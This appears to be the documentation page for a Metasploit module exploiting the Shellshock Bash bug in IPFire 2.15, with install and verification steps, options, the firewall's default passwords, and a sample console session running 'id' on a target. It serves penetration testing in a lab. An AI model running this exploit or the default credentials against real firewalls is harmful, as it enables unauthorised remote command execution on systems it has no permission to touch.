## Vulnerable Application

  Official Source: [ipfire](http://downloads.ipfire.org/releases/ipfire-2.x/2.15-core82/ipfire-2.15.i586-full-core82.iso)
  Archived Copy: [github](https://github.com/h00die/MSF-Testing-Scripts)

## Verification Steps

  1. Install the firewall
  2. Start msfconsole
  3. Do: ```use exploit/linux/http/ipfire_bashbug_exec```
  4. Do: ```set rhost 10.10.10.10```
  5. Do: ```set PASSWORD admin```
  6. Do: ```set CMD ls```
  7. Do: ```run```
  8. You should see the output of the command that was run.

## Options

  **PASSWORD**

  Password is set at install.  May be blank, 'admin', or 'ipfire'.
  
  **CMD**
  
  This is the command to run on the system.

## Scenarios

  Example of running the ID command
  ```
    msf > use exploit/linux/http/ipfire_bashbug_exec 
    msf exploit(ipfire_bashbug_exec) > set PASSWORD admin
    PASSWORD => admin
    msf exploit(ipfire_bashbug_exec) > set rhost 192.168.2.202
    rhost => 192.168.2.202
    msf exploit(ipfire_bashbug_exec) > set CMD id
    CMD => id
    msf exploit(ipfire_bashbug_exec) > exploit
    
    [+] uid=99(nobody) gid=99(nobody) groups=16(dialout),23(squid),99(nobody)
    [*] Exploit completed, but no session was created.
  ```